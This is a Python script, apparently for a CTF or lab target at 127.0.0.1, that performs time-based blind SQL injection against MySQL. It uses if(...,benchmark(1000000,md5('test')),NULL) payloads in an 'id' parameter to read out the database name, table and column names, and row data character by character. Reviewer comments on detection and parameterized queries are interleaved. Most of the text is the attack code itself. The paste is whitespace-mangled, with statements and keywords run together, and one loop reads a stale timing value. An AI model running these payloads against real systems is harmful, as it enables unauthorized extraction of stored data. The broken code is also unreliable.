mysql benchmark 注入_sql注入------基于时间延迟benchmark函数注入脚本

#author:windy_2

importrequests

# NOTE(review): lab demonstration (target is 127.0.0.1) of time-based blind SQL
# injection against a MySQL backend. Every probe below embeds
# `if(<condition>, benchmark(1000000,md5('test')), NULL)` in the `id` GET parameter,
# ends the query with `%23` (URL-encoded `#`), and treats a response slower than
# 1.5 s (`r.elapsed.total_seconds() > 1.5`) as "condition true", so data is
# recovered one character per request from the alphabet in `payloads`.
# Defender's view:
#  - detection: the web access log shows long runs of GETs whose query string
#    carries `benchmark(`, `information_schema`, `substr(`/`length(` and a
#    trailing `%23`; the delay is generated by the database itself, so DB-side
#    monitoring (slow-query log, process list, CPU) presumably sees the same burst.
#    These literal tokens are cheap WAF / SIEM rules.
#  - mitigation: the technique only works because `id` is concatenated into the
#    SQL text; a parameterized (prepared) query removes the injection point.
#    Rate limiting and per-client response-time anomaly alerts shorten the
#    window of a probe like this.
# The paste is whitespace-mangled (several statements share a physical line);
# the comments describe the text as shown.

# urlx: prefix for extracting the current database name character by character
# (used by main()); payloads: the character set tried at each position.
urlx= 'http://127.0.0.1/?id= 1 and if((substr((select database()),'payloads= 'qwertyuiopasdfghjklzxcvbnm{}_0123456789'

# guess_column(table): enumerates the column names of `table` through
# information_schema.columns (count, per-name length, then characters), counts
# the rows of `table` using the first discovered column, dumps every row of
# every column, and prints a header line followed by the rows.
defguess_column(table):

string= ''extend=0
# `string` above is assigned but never read in this function.

list=[]
# `list` shadows the builtin of the same name.

length2=0

num=[]

num1=[]

# url1: count of columns; url2: substr of a column name; url3: length of a
# column name; url4: substr of a cell value; url5: row count; url7: cell length.
url1= 'http://127.0.0.1/?id= 1 and if(((select count(column_name) from information_schema.columns where table_name=\''+ table + '\')='url2= 'http://127.0.0.1/?id= 1 and if((substr((select column_name from information_schema.columns where table_name=\'' + table + '\' limit'url3= 'http://127.0.0.1/?id= 1 and if(((select length(column_name) from information_schema.columns where table_name=\'' + table + '\' limit'url4= 'http://127.0.0.1/?id= 1 and if(((substr((select'url5= 'http://127.0.0.1/?id= 1 and if(((select count('url7= 'http://127.0.0.1/?id= 1 and if(((select length('

for i in range(50): # get the number of columns

url = url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)print(url)

time=r.elapsed.total_seconds()print(time)if time > 1.5: # elapsed time is the only oracle

extend=i

length2=ibreak

for k inrange(extend):

st= ''extend1=0for m in range(100):

url= url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23' # get the column-name length

r =requests.get(url)if time > 1.5:

extend1=mbreak

for i in range(1,extend1+1): # get the column name

for payload inpayloads:

url= url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:print(url)

st+=payloadbreaklist.append(st)

num1.append(st)

length=0for i in range(1,10000): # get the number of records

url = url5 + str(num1[0]) + ') from' + table + ')=' + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'

print(url)

r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

length=ibreak

for column inlist:

str1= ''

for i inrange(length):

length1=0

url6= url4 + str(column) + 'from' + table + 'limit' +str(i)for k in range(100): # get the record length

url = url7 + str(column) + ') from'+ table + 'limit' + str(i) + ',1)=' + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:print(url)

length1=kbreak

for n in range(1,length1+1): # get the record

for payload inpayloads:

url= url6 + ',1),' + str(n) + ',1))=\'' + str(payload) + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:print(url)

str1+=payloadbreaknum.append(str1)

str1= ''

# Output: column names on one line, then `length2` rows read out of `num`,
# which holds the values column-major (index i + length * k).
for column innum1:print(column+' ',end='')print('\n',end='')for i inrange(length2):for k inrange(length):

# guess_table(): enumerates table names of the current database through
# information_schema.tables (count, per-name length, characters), prints them
# between '------------' separators, then calls guess_column('flag').
x= i + length *kprint(num[x]+' ',end='')print('\n',end='')defguess_table():

string= ''extend=0
# `string` above is assigned but never read in this function.

list=[]

# url1: table count; url2: substr of a table name; url3: length of a table name.
url1= 'http://127.0.0.1/?id= 1 and if(((select count(table_name) from information_schema.tables where table_schema=database())='url2= 'http://127.0.0.1/?id= 1 and if((substr((select table_name from information_schema.tables where table_schema=database() limit'url3= 'http://127.0.0.1/?id= 1 and if(((select length(table_name) from information_schema.tables where table_schema=database() limit'

for i in range(50): # get the number of tables

url= url1 + str(i) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

extend=ibreak

for k inrange(extend):

st= ''extend1=0for m in range(100): # get the table-name length

url= url3 + str(k) + ',1)=' + str(m) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

extend1=mbreak

for i in range(1,extend1+1):for payload inpayloads: # get the table name

url= url2 + str(k) + ',1),' + str(i) + ',1)=\'' + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

st+=payloadbreaklist.append(st)print('------------')for i inlist:print(f'[*]{i}')print('------------')

# main(): finds the length of database() (up to 20), then its characters via
# urlx, prints the name, and continues into guess_table().
guess_column('flag')defmain():

string= ''url1= 'http://127.0.0.1/?id= 1 and if((length(database())='extend=0for k in range(20): # get the database-name length

url= url1 + str(k) + '),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

extend=kbreak

for i in range(1,extend+1):for payload inpayloads: # get the database name

url= urlx + str(i) + ',1)=\''url= url + payload + '\'),benchmark(1000000,md5(\'test\')),NULL); %23'r=requests.get(url)

time=r.elapsed.total_seconds()if time > 1.5:

string+=payloadbreak

print(f'available database\n[*] {string}')

guess_table()

# Module-level entry point: runs the whole chain on import/execution.
main()
